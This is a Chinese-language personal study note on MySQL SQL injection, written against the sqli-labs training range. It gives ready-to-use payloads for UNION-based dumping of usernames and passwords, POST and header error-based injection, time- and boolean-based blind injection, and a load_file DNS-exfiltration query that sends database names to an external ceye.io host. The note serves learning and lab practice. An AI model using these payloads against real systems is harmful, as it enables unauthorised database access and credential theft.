mysql大于等于5.0学习总结笔记

基于交流分享的基本原则

我建议对mysql注入感兴趣的同学可以在本地安装一个sqli-lab，不同类型管卡不同难度管卡

笔记为个人记录和一些收集，内容本人已做过测试

学无止境，有不足和错误的地方大家可以指出

不懂的地方可以评论给出，我看回复可以给解答

附件中我传了txt版本的，我建议做笔记或者查看笔记不要用notepad，Windows自带的看起来头痛可以自己搜索其他的软体。

#部分字符或者空格被进行了URL转义 %20为空格，%22,%27为双单引号#

语言分类：解释型语言和编译型语言

注入出现在解释型语言中，由于和客户产生交互因此客户可以任意输入可能导致sql注入。

要点：1.用户可以提交数据可以输入数据 2.用户的数据最后会与数据库产生交互，即当作sql语言执行

MySQL5.0以上有information_schema数据库用于管理当前数据库中的数据库名（schemata），表名（tables），列名（columns）

schemata表中schema_name字段用来存储数据库名

tables表中table_schema存储表对应的数据table_name表示表名

columns表中，table_schema()表示字段对应的数据库，table_name表示字段对应的表名，column_name表示字段名

select,update,delete,insert

select 列名称 from 表名称 where 字段1=‘条件1’and 字段2=‘条件2’

insert into 表名 （列1，列2......）values（值1，值2......）

update 表名称 set 列名称=新值 where 列名称=值

delete from 表名称 where 列名称=某值

mysql常用系统函数 user()/system_user()/session_user()/current_user()[查看登录名] schema()/database()[查看当前使用的数据名] version()[查看当前数据库版本]

limit关键字，limit(m,n)从m开始的n位数据其中m从0开始 如 select * from admin limit 0,2

在mysql中如果想要输入字符串但是单引号或者双引号被限制了，可以将字符串转16进制或者10进制ASCII码；例如'dumb'=char(100,117,109,98)=0x64756d62。

注释 单行注释 # -- （最后有一个空格，可以用20%替代）--+

     多行注释 /**/

     内联注释/*！sql语句*/ 内联注释中的sql语句会被识别

/*GET 基于sql回显报错的注入*/

通过在URL中修改对应的ID值，为正常数字、大数字、负数、或者在id后加字符（单引号、双引号、双单引号、括号）、反斜杠\来探测URL中是否存在注入点 其中反斜杠起到转义的作用

1、首选输入'根据mysql错误回显，构造当前sql语句的格式，然后闭合语句

http://127.0.0.1/sqli-labs-master/Less-1/index.php?id=1'

错误回显：You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

                首选去掉错误中最外层的一组'这个是输出错误时加入的，因此错误为'1'' LIMIT 0,1;我们加入了一个'号也去掉，因此正常语句为'1' LIMIT 0,1；所以我们需要闭合'以及注释掉后面的limit；

闭合语句构造：http://127.0.0.1/sqli-labs-master/Less-1/index.php?id=1'--+

2、判断出存在注入以后首先使用order by找出当前表的列数，建议使用对半法查找

order by 语句构造：http://127.0.0.1/sqli-labs-master/Less-1/index.php?id=1' order by 3--+

3、根据判断的列数我们使用union select查出报错可以输出的列数

union select语句构造:http://127.0.0.1/sqli-labs-master/Less-1/index.php?id=1' and 1=2 union select 1,2,3--+

其中加入and 1=2是为了让数据库报错，我们才能知道可以输入的列数

4、根据报错的列数，我们查询当前使用的版本、用户、数据库等；（以下方法仅限于数据库版本在mysql5.0以上）[user()、vesion()、database()]

语句构造：http://127.0.0.1/sqli-labs-master/Less-1/index.php?id=1%27%20and%201=2%20union%20select%201,version(),database()--+

5、根据information_schema数据库查询当前数据库的表名

语句构造: http://127.0.0.1/sqli-labs-master/Less-1/index.php?id=1%27%20and%201=2%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+

其中group_concat()函数是为了输出多个结果才使用的,可以将每个结果按照符号分割group_concat(table_name,';')

6、根据结果查询自己想要的表的列名

语句构造：http://127.0.0.1/sqli-labs-master/Less-1/index.php?id=1%27%20and%201=2%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27--+

7、根据结果构造语句查询自己想要的字段值

语句构造：http://127.0.0.1/sqli-labs-master/Less-1/index.php?id=1%27%20and%201=2%20union%20select%201,group_concat(username,%27:%27,password),3%20from%20users--+

如果group_concat(username,':',password)中的:号受到了限制可以用0x3a，0x7e代替

/*POST注入*/：

post注入是将数据加入到了数据包中，不在URL中显示，因此可以用brupsuit抓包然后再改包发包，余下操作步骤和GET一致;post一般出现在登录框，搜索框

POST /sqli-labs-master/Less-11/index.php HTTP/1.1

Host: 127.0.0.1

Content-Length: 38

Cache-Control: max-age=0

Origin: http://127.0.0.1

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3

Referer: http://127.0.0.1/sqli-labs-master/Less-11/index.php

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: id=123

Connection: close

uname=admin&passwd=admin&submit=Submit

如上就是一个post数据包，其中url栏中没有参数，参数是在数据体中的uname、passwd；因此我们注入的时候要从这两个参数下手，head注入则是从数据头中的user-agent、referer、cookie入手。

/*head头注入*/：

header注入主要是因为将http数据包的数据头中内容存入了数据库，因此可以通过IP 或者 user-agent等内容进行注入

updatexml(目标xml文档,xml路径,更新的内容)，该函数用于更新xml文档，通过xml路径无法被找到来爆出sql错误

语句构造：updatexml(1,concat(0x7e,(select database()),0x7e),1)

extractvalue(取值,xml路径)

语句构造：extractvalue(1,concat(0x7e,(select database())))

insert语句和update语句注入均可使用updatexm(1,concat(0x7e,(select database())),1)；报错注入

head头注入中一定要注意insert注入中的方式，要知道sql语句的结构；不能使用注释符，应当采用闭合方式，而不是注释掉语句后半部分

insert into 表名 （列1，列2......）values（值1，值2......）

如下结构 insert into admin(id,username,password)values(4,'admin','admin')//这个是正确结构

如果我们使用了注释符那么就会报错insert into admin(id,username,password)values(4,'admin'#,'admin')//values的值和admin表需要插入的列数不一致报错

正确应该是：insert into admin(id,username,password)values(4,'admin' or '1'='1','admin')//其中' or '1'='1为我们插入的闭合结构，再使用updatexml()函数

insert into admin(id,username,password) values(5,'admin5' and updatexml(1,concat(0x7e,(select database())),1) or '1'='1','admin5')

/*盲注*/：

ASCII()函数只能提取字符串中第一个字符的ASCII码，因此需要用substr()等函数来截取字符,也可以用hex()来代替用户和ascii()一样，只是返回16进制数，ascii()返回10进制数

截取字符串字段函数substr(x,y,z)、mid(x,y,z),substring(x,y,z) 三个函数用法一致还可以通过right(x,1)来替换，更改1值可以从右往左提取字符；比如从右往左两个字符为right(x,2)，结合ascii()函数特性也可以一个个猜出

盲注（blind SQL）不在显示mysql执行错误，而是显示常规错误或者定义好的语句或者页面；分为基于布尔型的盲注和基于时间的盲注

基于时间的盲注

 基于时间盲注 if(ascii(substr(database(),1,1)=115,sleep(5),1))判断语句，如果database()的第一个字符ASCII码等于115那么就执行一次sleep(5)否则就输出1；如果网络状况比较差可以适当延长时间，sleep()可以用其他函数替换benchmark(time,exp)[运行exp，time次] benchmark(200000000,100*100%2)运行时间大概在5-6秒，如果不明显或者延迟严重可以更改time大小;如果if()函数被屏蔽可以用case when 1>0 then sleep(3) else 1 end;代替when后面接判断语句，true执行sleep()函数错误则输出1；更网页反应时间来判断。

1、猜解当前数据库的名字

http://127.0.0.1/sqli-labs-master/Less-9/index.php?id=1%27%20and%20if(ascii(substr(database(),1,1))=115,1,sleep(10))--+

2、猜测数据表对应表的值

http://127.0.0.1/sqli-labs-master/Less-9/index.php?id=1%27%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))%3E100,1,sleep(5))--+

3、猜解字段名

http://127.0.0.1/sqli-labs-master/Less-9/index.php?id=1%27%20and%20if(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27%20limit%200,1),1,1))%3E100,1,sleep(5))--+

4、猜解数据

http://127.0.0.1/sqli-labs-master/Less-9/index.php?id=1%27%20and%20if(ascii(substr((select%20username%20from%20security.users%20limit%200,1),1,1))%3E50,1,sleep(5))--+

基于布尔型的盲注（由于判断ASCII码比较耗费时间所以布尔型建议用Brupsuit跑；）

1、猜解当前数据库的名字

http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1%27%20and%20ascii(substr(database(),1,1))=115--+

2、猜解对应数据库有几张表

http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1%27and(select%20length(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1)%3E0--+

通过调整limit后面的数字来判断总共有多少张表

3，猜测数据表对应表的值

http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))=101--+

通过substr()函数截取出第一张表的值一个个猜解ASCII码，然后再继续猜解下一张表；表通过limit()函数控制，值通过substr()函数控制

4、猜解字段名

http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1%27and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27%20limit%200,1),2,1))%3E0--+

5、猜解数据

http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1%27and%20ascii(mid((select%20username%20from%20security.users%20limit%200,1),1,1))%3E0--+

盲注中除了改方法外还有使用locate(x,y,n)函数，这个函数主要功能是从y字符串中第n[n大于0]个位置查询x字符，返回第一个遇到的位置，比如locate('a','abcda',1)则返回1,locate('a','abcda',2)则返回5；首先我们可以利用locate('s',(select database()),1)>0;来判断s在不在数据库名字中，如果存在结果肯定大于0，由此便利大小写字母以及可能的字符，知道存在哪些字符的情况下，我们需要确定组合位置，那么我们就可以用折半法来查找，这个方法比猜解ascii来说不确定性高，因为数据库架构中用了很特殊的符号，可能没法遍历到，如果猜解ASCII码无法完成可以用这个方法试试。

/*mysql DNS注入*/:

http://x.x.x.x/index3.php/aaaa.jpg?id=1%20and%20load_file(concat('\\\\',(select%20database()),'.d5bqx6.ceye.io\\awa'))--+

DNS注入主要是利用了load_file();函数访问了外部的链接，再加上子查询的运用，就可以将子查询内容，反馈到我们外链的DNS请求记录中，例子来源于靶场。